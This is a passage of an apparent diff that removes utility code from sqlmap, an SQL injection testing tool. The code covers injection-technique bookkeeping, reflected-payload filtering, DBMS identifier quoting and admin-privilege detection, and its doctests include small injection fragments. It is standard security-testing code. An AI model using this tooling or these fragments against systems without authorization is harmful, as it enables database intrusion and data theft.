" - errMsg += "sqlmap will assume that you are an administrator " - errMsg += "which is mandatory for the requested takeover attack " - errMsg += "to work properly" - logger.error(errMsg) - - isAdmin = True - - return isAdmin - -def logHTTPTraffic(requestLogMsg, responseLogMsg): - """ - Logs HTTP traffic to the output file - """ - - if not conf.trafficFile: - return - - with kb.locks.log: - dataToTrafficFile("%s%s" % (requestLogMsg, os.linesep)) - dataToTrafficFile("%s%s" % (responseLogMsg, os.linesep)) - dataToTrafficFile("%s%s%s%s" % (os.linesep, 76 * '#', os.linesep, os.linesep)) - -def getPageTemplate(payload, place): # Cross-linked function - raise NotImplementedError - -def getPublicTypeMembers(type_, onlyValues=False): - """ - Useful for getting members from types (e.g. in enums) - - >>> [_ for _ in getPublicTypeMembers(OS, True)] - ['Linux', 'Windows'] - """ - - for name, value in inspect.getmembers(type_): - if not name.startswith('__'): - if not onlyValues: - yield (name, value) - else: - yield value - -def enumValueToNameLookup(type_, value_): - """ - Returns name of a enum member with a given value - - >>> enumValueToNameLookup(SORT_ORDER, 100) - 'LAST' - """ - - retVal = None - - for name, value in getPublicTypeMembers(type_): - if value == value_: - retVal = name - break - - return retVal - -def extractRegexResult(regex, content, flags=0): - """ - Returns 'result' group value from a possible match with regex on a given - content - - >>> extractRegexResult(r'a(?P[^g]+)g', 'abcdefg') - 'bcdef' - """ - - retVal = None - - if regex and content and "?P" in regex: - match = re.search(regex, content, flags) - - if match: - retVal = match.group("result") - - return retVal - -def extractTextTagContent(page): - """ - Returns list containing content from "textual" tags - - >>> extractTextTagContent(u'Title
foobar
Link') - [u'Title', u'foobar'] - """ - - page = page or "" - - if REFLECTED_VALUE_MARKER in page: - try: - page = re.sub(r"(?i)[^\s>]*%s[^\s<]*" % REFLECTED_VALUE_MARKER, "", page) - except MemoryError: - page = page.replace(REFLECTED_VALUE_MARKER, "") - - return filter(None, (_.group('result').strip() for _ in re.finditer(TEXT_TAG_REGEX, page))) - -def trimAlphaNum(value): - """ - Trims alpha numeric characters from start and ending of a given value - - >>> trimAlphaNum(u'AND 1>(2+3)-- foobar') - u' 1>(2+3)-- ' - """ - - while value and value[-1].isalnum(): - value = value[:-1] - - while value and value[0].isalnum(): - value = value[1:] - - return value - -def isNumPosStrValue(value): - """ - Returns True if value is a string (or integer) with a positive integer representation - - >>> isNumPosStrValue(1) - True - >>> isNumPosStrValue('1') - True - >>> isNumPosStrValue(0) - False - >>> isNumPosStrValue('-2') - False - """ - - return (value and isinstance(value, basestring) and value.isdigit() and int(value) > 0) or (isinstance(value, int) and value > 0) - -@cachedmethod -def aliasToDbmsEnum(dbms): - """ - Returns major DBMS name from a given alias - - >>> aliasToDbmsEnum('mssql') - 'Microsoft SQL Server' - """ - - retVal = None - - if dbms: - for key, item in DBMS_DICT.items(): - if dbms.lower() in item[0] or dbms.lower() == key.lower(): - retVal = key - break - - return retVal - -def findDynamicContent(firstPage, secondPage): - """ - This function checks if the provided pages have dynamic content. 
If they - are dynamic, proper markings will be made - """ - - if not firstPage or not secondPage: - return - - infoMsg = "searching for dynamic content" - logger.info(infoMsg) - - blocks = SequenceMatcher(None, firstPage, secondPage).get_matching_blocks() - kb.dynamicMarkings = [] - - # Removing too small matching blocks - for block in blocks[:]: - (_, _, length) = block - - if length <= DYNAMICITY_MARK_LENGTH: - blocks.remove(block) - - # Making of dynamic markings based on prefix/suffix principle - if len(blocks) > 0: - blocks.insert(0, None) - blocks.append(None) - - for i in xrange(len(blocks) - 1): - prefix = firstPage[blocks[i][0]:blocks[i][0] + blocks[i][2]] if blocks[i] else None - suffix = firstPage[blocks[i + 1][0]:blocks[i + 1][0] + blocks[i + 1][2]] if blocks[i + 1] else None - - if prefix is None and blocks[i + 1][0] == 0: - continue - - if suffix is None and (blocks[i][0] + blocks[i][2] >= len(firstPage)): - continue - - prefix = trimAlphaNum(prefix) - suffix = trimAlphaNum(suffix) - - kb.dynamicMarkings.append((prefix[-DYNAMICITY_MARK_LENGTH / 2:] if prefix else None, suffix[:DYNAMICITY_MARK_LENGTH / 2] if suffix else None)) - - if len(kb.dynamicMarkings) > 0: - infoMsg = "dynamic content marked for removal (%d region%s)" % (len(kb.dynamicMarkings), 's' if len(kb.dynamicMarkings) > 1 else '') - logger.info(infoMsg) - -def removeDynamicContent(page): - """ - Removing dynamic content from supplied page basing removal on - precalculated dynamic markings - """ - - if page: - for item in kb.dynamicMarkings: - prefix, suffix = item - - if prefix is None and suffix is None: - continue - elif prefix is None: - page = re.sub(r'(?s)^.+%s' % re.escape(suffix), suffix.replace('\\', r'\\'), page) - elif suffix is None: - page = re.sub(r'(?s)%s.+$' % re.escape(prefix), prefix.replace('\\', r'\\'), page) - else: - page = re.sub(r'(?s)%s.+%s' % (re.escape(prefix), re.escape(suffix)), '%s%s' % (prefix.replace('\\', r'\\'), suffix.replace('\\', r'\\')), page) - - 
return page - -def filterStringValue(value, charRegex, replacement=""): - """ - Returns string value consisting only of chars satisfying supplied - regular expression (note: it has to be in form [...]) - - >>> filterStringValue(u'wzydeadbeef0123#', r'[0-9a-f]') - u'deadbeef0123' - """ - - retVal = value - - if value: - retVal = re.sub(charRegex.replace("[", "[^") if "[^" not in charRegex else charRegex.replace("[^", "["), replacement, value) - - return retVal - -def filterControlChars(value): - """ - Returns string value with control chars being supstituted with ' ' - - >>> filterControlChars(u'AND 1>(2+3)\\n--') - u'AND 1>(2+3) --' - """ - - return filterStringValue(value, PRINTABLE_CHAR_REGEX, ' ') - -def isDBMSVersionAtLeast(version): - """ - Checks if the recognized DBMS version is at least the version - specified - """ - - retVal = None - - if Backend.getVersion() and Backend.getVersion() != UNKNOWN_DBMS_VERSION: - value = Backend.getVersion().replace(" ", "").rstrip('.') - - while True: - index = value.find('.', value.find('.') + 1) - - if index > -1: - value = value[0:index] + value[index + 1:] - else: - break - - value = filterStringValue(value, '[0-9.><=]') - - if isinstance(value, basestring): - if value.startswith(">="): - value = float(value.replace(">=", "")) - elif value.startswith(">"): - value = float(value.replace(">", "")) + 0.01 - elif value.startswith("<="): - value = float(value.replace("<=", "")) - elif value.startswith(">"): - value = float(value.replace("<", "")) - 0.01 - - retVal = getUnicode(value) >= getUnicode(version) - - return retVal - -def parseSqliteTableSchema(value): - """ - Parses table column names and types from specified SQLite table schema - """ - - if value: - table = {} - columns = {} - - for match in re.finditer(r"(\w+)[\"'`]?\s+(INT|INTEGER|TINYINT|SMALLINT|MEDIUMINT|BIGINT|UNSIGNED BIG INT|INT2|INT8|INTEGER|CHARACTER|VARCHAR|VARYING CHARACTER|NCHAR|NATIVE CHARACTER|NVARCHAR|TEXT|CLOB|LONGTEXT|BLOB|NONE|REAL|DOUBLE|DOUBLE 
PRECISION|FLOAT|REAL|NUMERIC|DECIMAL|BOOLEAN|DATE|DATETIME|NUMERIC)\b", value, re.I): - columns[match.group(1)] = match.group(2) - - table[conf.tbl] = columns - kb.data.cachedColumns[conf.db] = table - -def getTechniqueData(technique=None): - """ - Returns injection data for technique specified - """ - - return kb.injection.data.get(technique) - -def isTechniqueAvailable(technique): - """ - Returns True if there is injection data which sqlmap could use for - technique specified - """ - - if conf.tech and isinstance(conf.tech, list) and technique not in conf.tech: - return False - else: - return getTechniqueData(technique) is not None - -def isStackingAvailable(): - """ - Returns True whether techniques using stacking are available - """ - - retVal = False - - if PAYLOAD.TECHNIQUE.STACKED in kb.injection.data: - retVal = True - else: - for technique in getPublicTypeMembers(PAYLOAD.TECHNIQUE, True): - _ = getTechniqueData(technique) - if _ and "stacked" in _["title"].lower(): - retVal = True - break - - return retVal - -def isInferenceAvailable(): - """ - Returns True whether techniques using inference technique are available - """ - - return any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.BOOLEAN, PAYLOAD.TECHNIQUE.STACKED, PAYLOAD.TECHNIQUE.TIME)) - -def setOptimize(): - """ - Sets options turned on by switch '-o' - """ - - #conf.predictOutput = True - conf.keepAlive = True - conf.threads = 3 if conf.threads < 3 else conf.threads - conf.nullConnection = not any((conf.data, conf.textOnly, conf.titles, conf.string, conf.notString, conf.regexp, conf.tor)) - - if not conf.nullConnection: - debugMsg = "turning off --null-connection switch used indirectly by switch -o" - logger.debug(debugMsg) - -def initTechnique(technique=None): - """ - Prepares data for technique specified - """ - - try: - data = getTechniqueData(technique) - resetCounter(technique) - - if data: - kb.pageTemplate, kb.errorIsNone = getPageTemplate(data.templatePayload, kb.injection.place) - 
kb.matchRatio = data.matchRatio - kb.negativeLogic = (technique == PAYLOAD.TECHNIQUE.BOOLEAN) and (data.where == PAYLOAD.WHERE.NEGATIVE) - - # Restoring stored conf options - for key, value in kb.injection.conf.items(): - if value and (not hasattr(conf, key) or (hasattr(conf, key) and not getattr(conf, key))): - setattr(conf, key, value) - debugMsg = "resuming configuration option '%s' (%s)" % (key, value) - logger.debug(debugMsg) - - if value and key == "optimize": - setOptimize() - else: - warnMsg = "there is no injection data available for technique " - warnMsg += "'%s'" % enumValueToNameLookup(PAYLOAD.TECHNIQUE, technique) - logger.warn(warnMsg) - - except SqlmapDataException: - errMsg = "missing data in old session file(s). " - errMsg += "Please use '--flush-session' to deal " - errMsg += "with this error" - raise SqlmapNoneDataException(errMsg) - -def arrayizeValue(value): - """ - Makes a list out of value if it is not already a list or tuple itself - - >>> arrayizeValue(u'1') - [u'1'] - """ - - if not isListLike(value): - value = [value] - - return value - -def unArrayizeValue(value): - """ - Makes a value out of iterable if it is a list or tuple itself - - >>> unArrayizeValue([u'1']) - u'1' - """ - - if isListLike(value): - if not value: - value = None - elif len(value) == 1 and not isListLike(value[0]): - value = value[0] - else: - _ = filter(lambda _: _ is not None, (_ for _ in flattenValue(value))) - value = _[0] if len(_) > 0 else None - - return value - -def flattenValue(value): - """ - Returns an iterator representing flat representation of a given value - - >>> [_ for _ in flattenValue([[u'1'], [[u'2'], u'3']])] - [u'1', u'2', u'3'] - """ - - for i in iter(value): - if isListLike(i): - for j in flattenValue(i): - yield j - else: - yield i - -def isListLike(value): - """ - Returns True if the given value is a list-like instance - - >>> isListLike([1, 2, 3]) - True - >>> isListLike(u'2') - False - """ - - return isinstance(value, (list, tuple, set, 
BigArray)) - -def getSortedInjectionTests(): - """ - Returns prioritized test list by eventually detected DBMS from error - messages - """ - - retVal = copy.deepcopy(conf.tests) - - def priorityFunction(test): - retVal = SORT_ORDER.FIRST - - if test.stype == PAYLOAD.TECHNIQUE.UNION: - retVal = SORT_ORDER.LAST - - elif 'details' in test and 'dbms' in test.details: - if intersect(test.details.dbms, Backend.getIdentifiedDbms()): - retVal = SORT_ORDER.SECOND - else: - retVal = SORT_ORDER.THIRD - - return retVal - - if Backend.getIdentifiedDbms(): - retVal = sorted(retVal, key=priorityFunction) - - return retVal - -def filterListValue(value, regex): - """ - Returns list with items that have parts satisfying given regular - expression - - >>> filterListValue(['users', 'admins', 'logs'], r'(users|admins)') - ['users', 'admins'] - """ - - if isinstance(value, list) and regex: - retVal = filter(lambda _: re.search(regex, _, re.I), value) - else: - retVal = value - - return retVal - -def showHttpErrorCodes(): - """ - Shows all HTTP error codes raised till now - """ - - if kb.httpErrorCodes: - warnMsg = "HTTP error codes detected during run:\n" - warnMsg += ", ".join("%d (%s) - %d times" % (code, httplib.responses[code] \ - if code in httplib.responses else '?', count) \ - for code, count in kb.httpErrorCodes.items()) - logger.warn(warnMsg) - if any((str(_).startswith('4') or str(_).startswith('5')) and _ != httplib.INTERNAL_SERVER_ERROR and _ != kb.originalCode for _ in kb.httpErrorCodes.keys()): - msg = "too many 4xx and/or 5xx HTTP error codes " - msg += "could mean that some kind of protection is involved (e.g. 
WAF)" - logger.debug(msg) - -def openFile(filename, mode='r', encoding=UNICODE_ENCODING, errors="replace", buffering=1): # "buffering=1" means line buffered (Reference: http://stackoverflow.com/a/3168436) - """ - Returns file handle of a given filename - """ - - try: - return codecs.open(filename, mode, encoding, errors, buffering) - except IOError: - errMsg = "there has been a file opening error for filename '%s'. " % filename - errMsg += "Please check %s permissions on a file " % ("write" if \ - mode and ('w' in mode or 'a' in mode or '+' in mode) else "read") - errMsg += "and that it's not locked by another process." - raise SqlmapSystemException(errMsg) - -def decodeIntToUnicode(value): - """ - Decodes inferenced integer value to an unicode character - - >>> decodeIntToUnicode(35) - u'#' - >>> decodeIntToUnicode(64) - u'@' - """ - retVal = value - - if isinstance(value, int): - try: - if value > 255: - _ = "%x" % value - if len(_) % 2 == 1: - _ = "0%s" % _ - raw = hexdecode(_) - - if Backend.isDbms(DBMS.MSSQL): - retVal = getUnicode(raw, "UTF-16-BE") - elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.ORACLE): - retVal = unichr(value) - else: - retVal = getUnicode(raw, conf.charset) - else: - retVal = getUnicode(chr(value)) - except: - retVal = INFERENCE_UNKNOWN_CHAR - - return retVal - -def unhandledExceptionMessage(): - """ - Returns detailed message about occurred unhandled exception - """ - - errMsg = "unhandled exception occurred in %s. It is recommended to retry your " % VERSION_STRING - errMsg += "run with the latest development version from official GitHub " - errMsg += "repository at '%s'. If the exception persists, please open a new issue " % GIT_PAGE - errMsg += "at '%s' " % ISSUES_PAGE - errMsg += "with the following text and any other information required to " - errMsg += "reproduce the bug. 
The " - errMsg += "developers will try to reproduce the bug, fix it accordingly " - errMsg += "and get back to you\n" - errMsg += "sqlmap version: %s\n" % VERSION_STRING[VERSION_STRING.find('/') + 1:] - errMsg += "Python version: %s\n" % PYVERSION - errMsg += "Operating system: %s\n" % PLATFORM - errMsg += "Command line: %s\n" % re.sub(r".+?\bsqlmap.py\b", "sqlmap.py", getUnicode(" ".join(sys.argv), encoding=sys.stdin.encoding)) - errMsg += "Technique: %s\n" % (enumValueToNameLookup(PAYLOAD.TECHNIQUE, kb.technique) if kb.get("technique") else ("DIRECT" if conf.get("direct") else None)) - errMsg += "Back-end DBMS: %s" % ("%s (fingerprinted)" % Backend.getDbms() if Backend.getDbms() is not None else "%s (identified)" % Backend.getIdentifiedDbms()) - - return errMsg - -def createGithubIssue(errMsg, excMsg): - """ - Automatically create a Github issue with unhandled exception information - """ - - issues = [] - try: - issues = getFileItems(paths.GITHUB_HISTORY, unique=True) - except: - pass - finally: - issues = set(issues) - - _ = re.sub(r"'[^']+'", "''", excMsg) - _ = re.sub(r"\s+line \d+", "", _) - _ = re.sub(r'File ".+?/(\w+\.py)', "\g<1>", _) - _ = re.sub(r".+\Z", "", _) - key = hashlib.md5(_).hexdigest()[:8] - - if key in issues: - return - - msg = "\ndo you want to automatically create a new (anonymized) issue " - msg += "with the unhandled exception information at " - msg += "the official Github repository? 
[y/N] " - try: - test = readInput(msg, default="N") - except: - test = None - - if test and test[0] in ("y", "Y"): - ex = None - errMsg = errMsg[errMsg.find("\n"):] - - - data = {"title": "Unhandled exception (#%s)" % key, "body": "```%s\n```\n```\n%s```" % (errMsg, excMsg)} - req = urllib2.Request(url="https://api.github.com/repos/sqlmapproject/sqlmap/issues", data=json.dumps(data), headers={"Authorization": "token %s" % GITHUB_REPORT_OAUTH_TOKEN.decode("base64")}) - - try: - f = urllib2.urlopen(req) - content = f.read() - except Exception, ex: - content = None - - issueUrl = re.search(r"https://github.com/sqlmapproject/sqlmap/issues/\d+", content or "") - if issueUrl: - infoMsg = "created Github issue can been found at the address '%s'" % issueUrl.group(0) - logger.info(infoMsg) - - try: - with open(paths.GITHUB_HISTORY, "a+b") as f: - f.write("%s\n" % key) - except: - pass - else: - warnMsg = "something went wrong while creating a Github issue" - if ex: - warnMsg += " ('%s')" % getSafeExString(ex) - if "Unauthorized" in warnMsg: - warnMsg += ". 
Please update to the latest revision" - logger.warn(warnMsg) - -def maskSensitiveData(msg): - """ - Masks sensitive data in the supplied message - """ - - retVal = getUnicode(msg) - - for item in filter(None, map(lambda x: conf.get(x), ("hostname", "data", "googleDork", "authCred", "proxyCred", "tbl", "db", "col", "user", "cookie", "proxy", "rFile", "wFile", "dFile"))): - regex = SENSITIVE_DATA_REGEX % re.sub("(\W)", r"\\\1", getUnicode(item)) - while extractRegexResult(regex, retVal): - value = extractRegexResult(regex, retVal) - retVal = retVal.replace(value, '*' * len(value)) - - if not conf.get("hostname"): - match = re.search(r"(?i)sqlmap.+(-u|--url)(\s+|=)([^ ]+)", retVal) - if match: - retVal = retVal.replace(match.group(3), '*' * len(match.group(3))) - - if getpass.getuser(): - retVal = re.sub(r"(?i)\b%s\b" % re.escape(getpass.getuser()), "*" * len(getpass.getuser()), retVal) - - return retVal - -def listToStrValue(value): - """ - Flattens list to a string value - - >>> listToStrValue([1,2,3]) - '1, 2, 3' - """ - - if isinstance(value, (set, tuple)): - value = list(value) - - if isinstance(value, list): - retVal = value.__str__().lstrip('[').rstrip(']') - else: - retVal = value - - return retVal - -def getExceptionFrameLocals(): - """ - Returns dictionary with local variable content from frame - where exception has been raised - """ - - retVal = {} - - if sys.exc_info(): - trace = sys.exc_info()[2] - while trace.tb_next: - trace = trace.tb_next - retVal = trace.tb_frame.f_locals - - return retVal - -def intersect(valueA, valueB, lowerCase=False): - """ - Returns intersection of the array-ized values - - >>> intersect([1, 2, 3], set([1,3])) - [1, 3] - """ - - retVal = [] - - if valueA and valueB: - valueA = arrayizeValue(valueA) - valueB = arrayizeValue(valueB) - - if lowerCase: - valueA = [val.lower() if isinstance(val, basestring) else val for val in valueA] - valueB = [val.lower() if isinstance(val, basestring) else val for val in valueB] - - retVal = 
[val for val in valueA if val in valueB] - - return retVal - -def cpuThrottle(value): - """ - Does a CPU throttling for lesser CPU consumption - """ - - delay = 0.00001 * (value ** 2) - time.sleep(delay) - -def removeReflectiveValues(content, payload, suppressWarning=False): - """ - Neutralizes reflective values in a given content based on a payload - (e.g. ..search.php?q=1 AND 1=2 --> "...searching for 1%20AND%201%3D2..." --> "...searching for __REFLECTED_VALUE__...") - """ - - retVal = content - - try: - if all([content, payload]) and isinstance(content, unicode) and kb.reflectiveMechanism and not kb.heuristicMode: - def _(value): - while 2 * REFLECTED_REPLACEMENT_REGEX in value: - value = value.replace(2 * REFLECTED_REPLACEMENT_REGEX, REFLECTED_REPLACEMENT_REGEX) - return value - - payload = getUnicode(urldecode(payload.replace(PAYLOAD_DELIMITER, ''), convall=True)) - regex = _(filterStringValue(payload, r"[A-Za-z0-9]", REFLECTED_REPLACEMENT_REGEX.encode("string-escape"))) - - if regex != payload: - if all(part.lower() in content.lower() for part in filter(None, regex.split(REFLECTED_REPLACEMENT_REGEX))[1:]): # fast optimization check - parts = regex.split(REFLECTED_REPLACEMENT_REGEX) - retVal = content.replace(payload, REFLECTED_VALUE_MARKER) # dummy approach - - if len(parts) > REFLECTED_MAX_REGEX_PARTS: # preventing CPU hogs - regex = _("%s%s%s" % (REFLECTED_REPLACEMENT_REGEX.join(parts[:REFLECTED_MAX_REGEX_PARTS / 2]), REFLECTED_REPLACEMENT_REGEX, REFLECTED_REPLACEMENT_REGEX.join(parts[-REFLECTED_MAX_REGEX_PARTS / 2:]))) - - parts = filter(None, regex.split(REFLECTED_REPLACEMENT_REGEX)) - - if regex.startswith(REFLECTED_REPLACEMENT_REGEX): - regex = r"%s%s" % (REFLECTED_BORDER_REGEX, regex[len(REFLECTED_REPLACEMENT_REGEX):]) - else: - regex = r"\b%s" % regex - - if regex.endswith(REFLECTED_REPLACEMENT_REGEX): - regex = r"%s%s" % (regex[:-len(REFLECTED_REPLACEMENT_REGEX)], REFLECTED_BORDER_REGEX) - else: - regex = r"%s\b" % regex - - retVal = re.sub(r"(?i)%s" 
% regex, REFLECTED_VALUE_MARKER, retVal) - - if len(parts) > 2: - regex = REFLECTED_REPLACEMENT_REGEX.join(parts[1:]) - retVal = re.sub(r"(?i)\b%s\b" % regex, REFLECTED_VALUE_MARKER, retVal) - - if retVal != content: - kb.reflectiveCounters[REFLECTIVE_COUNTER.HIT] += 1 - if not suppressWarning: - warnMsg = "reflective value(s) found and filtering out" - singleTimeWarnMessage(warnMsg) - - if re.search(r"FRAME[^>]+src=[^>]*%s" % REFLECTED_VALUE_MARKER, retVal, re.I): - warnMsg = "frames detected containing attacked parameter values. Please be sure to " - warnMsg += "test those separately in case that attack on this page fails" - singleTimeWarnMessage(warnMsg) - - elif not kb.testMode and not kb.reflectiveCounters[REFLECTIVE_COUNTER.HIT]: - kb.reflectiveCounters[REFLECTIVE_COUNTER.MISS] += 1 - if kb.reflectiveCounters[REFLECTIVE_COUNTER.MISS] > REFLECTIVE_MISS_THRESHOLD: - kb.reflectiveMechanism = False - if not suppressWarning: - debugMsg = "turning off reflection removal mechanism (for optimization purposes)" - logger.debug(debugMsg) - except MemoryError: - kb.reflectiveMechanism = False - if not suppressWarning: - debugMsg = "turning off reflection removal mechanism (because of low memory issues)" - logger.debug(debugMsg) - - return retVal - -def normalizeUnicode(value): - """ - Does an ASCII normalization of unicode strings - Reference: http://www.peterbe.com/plog/unicode-to-ascii - - >>> normalizeUnicode(u'\u0161u\u0107uraj') - 'sucuraj' - """ - - return unicodedata.normalize('NFKD', value).encode('ascii', 'ignore') if isinstance(value, unicode) else value - -def safeSQLIdentificatorNaming(name, isTable=False): - """ - Returns a safe representation of SQL identificator name (internal data format) - Reference: http://stackoverflow.com/questions/954884/what-special-characters-are-allowed-in-t-sql-column-retVal - """ - - retVal = name - - if isinstance(name, basestring): - retVal = getUnicode(name) - _ = isTable and Backend.getIdentifiedDbms() in (DBMS.MSSQL, 
DBMS.SYBASE) - - if _: - retVal = re.sub(r"(?i)\A%s\." % DEFAULT_MSSQL_SCHEMA, "", retVal) - - if retVal.upper() in kb.keywords or (retVal or " ")[0].isdigit() or not re.match(r"\A[A-Za-z0-9_@%s\$]+\Z" % ("." if _ else ""), retVal): # MsSQL is the only DBMS where we automatically prepend schema to table name (dot is normal) - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.ACCESS): - retVal = "`%s`" % retVal.strip("`") - elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.DB2): - retVal = "\"%s\"" % retVal.strip("\"") - elif Backend.getIdentifiedDbms() in (DBMS.ORACLE,): - retVal = "\"%s\"" % retVal.strip("\"").upper() - elif Backend.getIdentifiedDbms() in (DBMS.MSSQL,) and not re.match(r"\A\w+\Z", retVal, re.U): - retVal = "[%s]" % retVal.strip("[]") - - if _ and DEFAULT_MSSQL_SCHEMA not in retVal and '.' not in re.sub(r"\[[^]]+\]", "", retVal): - retVal = "%s.%s" % (DEFAULT_MSSQL_SCHEMA, retVal) - - return retVal - -def unsafeSQLIdentificatorNaming(name): - """ - Extracts identificator's name from its safe SQL representation - """ - - retVal = name - - if isinstance(name, basestring): - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.ACCESS): - retVal = name.replace("`", "") - elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.DB2): - retVal = name.replace("\"", "") - elif Backend.getIdentifiedDbms() in (DBMS.ORACLE,): - retVal = name.replace("\"", "").upper() - elif Backend.getIdentifiedDbms() in (DBMS.MSSQL,): - retVal = name.replace("[", "").replace("]", "") - - if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE): - prefix = "%s." 
% DEFAULT_MSSQL_SCHEMA - if retVal.startswith(prefix): - retVal = retVal[len(prefix):] - - return retVal - -def isNoneValue(value): - """ - Returns whether the value is unusable (None or '') - - >>> isNoneValue(None) - True - >>> isNoneValue('None') - True - >>> isNoneValue('') - True - >>> isNoneValue([]) - True - >>> isNoneValue([2]) - False - """ - - if isinstance(value, basestring): - return value in ("None", "") - elif isListLike(value): - return all(isNoneValue(_) for _ in value) - elif isinstance(value, dict): - return not any(value) - else: - return value is None - -def isNullValue(value): - """ - Returns whether the value contains explicit 'NULL' value - - >>> isNullValue(u'NULL') - True - >>> isNullValue(u'foobar') - False - """ - - return isinstance(value, basestring) and value.upper() == NULL - -def expandMnemonics(mnemonics, parser, args): - """ - Expands mnemonic options - """ - - class MnemonicNode(object): - def __init__(self): - self.next = {} - self.current = [] - - head = MnemonicNode() - pointer = None - - for group in parser.option_groups: - for option in group.option_list: - for opt in option._long_opts + option._short_opts: - pointer = head - - for char in opt: - if char == "-": - continue - elif char not in pointer.next: - pointer.next[char] = MnemonicNode() - - pointer = pointer.next[char] - pointer.current.append(option) - - for mnemonic in (mnemonics or "").split(','): - found = None - name = mnemonic.split('=')[0].replace("-", "").strip() - value = mnemonic.split('=')[1] if len(mnemonic.split('=')) > 1 else None - pointer = head - - for char in name: - if char in pointer.next: - pointer = pointer.next[char] - else: - pointer = None - break - - if pointer in (None, head): - errMsg = "mnemonic '%s' can't be resolved to any parameter name" % name - raise SqlmapSyntaxException(errMsg) - - elif len(pointer.current) > 1: - options = {} - - for option in pointer.current: - for opt in option._long_opts + option._short_opts: - opt = 
opt.strip('-') - if opt.startswith(name): - options[opt] = option - - if not options: - warnMsg = "mnemonic '%s' can't be resolved" % name - logger.warn(warnMsg) - elif name in options: - found = name - debugMsg = "mnemonic '%s' resolved to %s). " % (name, found) - logger.debug(debugMsg) - else: - found = sorted(options.keys(), key=lambda x: len(x))[0] - warnMsg = "detected ambiguity (mnemonic '%s' can be resolved to: %s). " % (name, ", ".join("'%s'" % key for key in options.keys())) - warnMsg += "Resolved to shortest of those ('%s')" % found - logger.warn(warnMsg) - - if found: - found = options[found] - else: - found = pointer.current[0] - debugMsg = "mnemonic '%s' resolved to %s). " % (name, found) - logger.debug(debugMsg) - - if found: - try: - value = found.convert_value(found, value) - except OptionValueError: - value = None - - if value is not None: - setattr(args, found.dest, value) - elif not found.type: # boolean - setattr(args, found.dest, True) - else: - errMsg = "mnemonic '%s' requires value of type '%s'" % (name, found.type) - raise SqlmapSyntaxException(errMsg) - -def safeCSValue(value): - """ - Returns value safe for CSV dumping - Reference: http://tools.ietf.org/html/rfc4180 - - >>> safeCSValue(u'foo, bar') - u'"foo, bar"' - >>> safeCSValue(u'foobar') - u'foobar' - """ - - retVal = value - - if retVal and isinstance(retVal, basestring): - if not (retVal[0] == retVal[-1] == '"'): - if any(_ in retVal for _ in (conf.get("csvDel", defaults.csvDel), '"', '\n')): - retVal = '"%s"' % retVal.replace('"', '""') - - return retVal - -def filterPairValues(values): - """ - Returns only list-like values with length 2 - - >>> filterPairValues([[1, 2], [3], 1, [4, 5]]) - [[1, 2], [4, 5]] - """ - - retVal = [] - - if not isNoneValue(values) and hasattr(values, '__iter__'): - retVal = filter(lambda x: isinstance(x, (tuple, list, set)) and len(x) == 2, values) - - return retVal - -def randomizeParameterValue(value): - """ - Randomize a parameter value based on 
occurances of alphanumeric characters - - >>> random.seed(0) - >>> randomizeParameterValue('foobar') - 'rnvnav' - >>> randomizeParameterValue('17') - '83' - """ - - retVal = value - - value = re.sub(r"%[0-9a-fA-F]{2}", "", value) - - for match in re.finditer('[A-Z]+', value): - retVal = retVal.replace(match.group(), randomStr(len(match.group())).upper()) - - for match in re.finditer('[a-z]+', value): - retVal = retVal.replace(match.group(), randomStr(len(match.group())).lower()) - - for match in re.finditer('[0-9]+', value): - retVal = retVal.replace(match.group(), str(randomInt(len(match.group())))) - - return retVal - -def asciifyUrl(url, forceQuote=False): - """ - Attempts to make a unicode URL usuable with ``urllib/urllib2``. - - More specifically, it attempts to convert the unicode object ``url``, - which is meant to represent a IRI, to an unicode object that, - containing only ASCII characters, is a valid URI. This involves: - - * IDNA/Puny-encoding the domain name. - * UTF8-quoting the path and querystring parts. - - See also RFC 3987. - - Reference: http://blog.elsdoerfer.name/2008/12/12/opening-iris-in-python/ - - >>> asciifyUrl(u'http://www.\u0161u\u0107uraj.com') - u'http://www.xn--uuraj-gxa24d.com' - """ - - parts = urlparse.urlsplit(url) - if not parts.scheme or not parts.netloc: - # apparently not an url - return url - - if all(char in string.printable for char in url): - return url - - # idna-encode domain - try: - hostname = parts.hostname.encode("idna") - except LookupError: - hostname = parts.hostname.encode(UNICODE_ENCODING) - - # UTF8-quote the other parts. We check each part individually if - # if needs to be quoted - that should catch some additional user - # errors, say for example an umlaut in the username even though - # the path *is* already quoted. 
- def quote(s, safe): - s = s or '' - # Triggers on non-ascii characters - another option would be: - # urllib.quote(s.replace('%', '')) != s.replace('%', '') - # which would trigger on all %-characters, e.g. "&". - if s.encode("ascii", "replace") != s or forceQuote: - return urllib.quote(s.encode(UNICODE_ENCODING), safe=safe) - return s - - username = quote(parts.username, '') - password = quote(parts.password, safe='') - path = quote(parts.path, safe='/') - query = quote(parts.query, safe="&=") - - # put everything back together - netloc = hostname - if username or password: - netloc = '@' + netloc - if password: - netloc = ':' + password + netloc - netloc = username + netloc - - try: - port = parts.port - except: - port = None - - if port: - netloc += ':' + str(port) - - return urlparse.urlunsplit([parts.scheme, netloc, path, query, parts.fragment]) - -def isAdminFromPrivileges(privileges): - """ - Inspects privileges to see if those are comming from an admin user - """ - - # In PostgreSQL the usesuper privilege means that the - # user is DBA - retVal = (Backend.isDbms(DBMS.PGSQL) and "super" in privileges) - - # In Oracle the DBA privilege means that the - # user is DBA - retVal |= (Backend.isDbms(DBMS.ORACLE) and "DBA" in privileges) - - # In MySQL >= 5.0 the SUPER privilege means - # that the user is DBA - retVal |= (Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema and "SUPER" in privileges) - - # In MySQL < 5.0 the super_priv privilege means - # that the user is DBA - retVal |= (Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema and "super_priv" in privileges) - - # In Firebird there is no specific privilege that means - # that the user is DBA - # TODO: confirm - retVal |= (Backend.isDbms(DBMS.FIREBIRD) and all(_ in privileges for _ in ("SELECT", "INSERT", "UPDATE", "DELETE", "REFERENCES", "EXECUTE"))) - - return retVal - -def findPageForms(content, url, raise_=False, addToTargets=False): - """ - Parses given page content for 
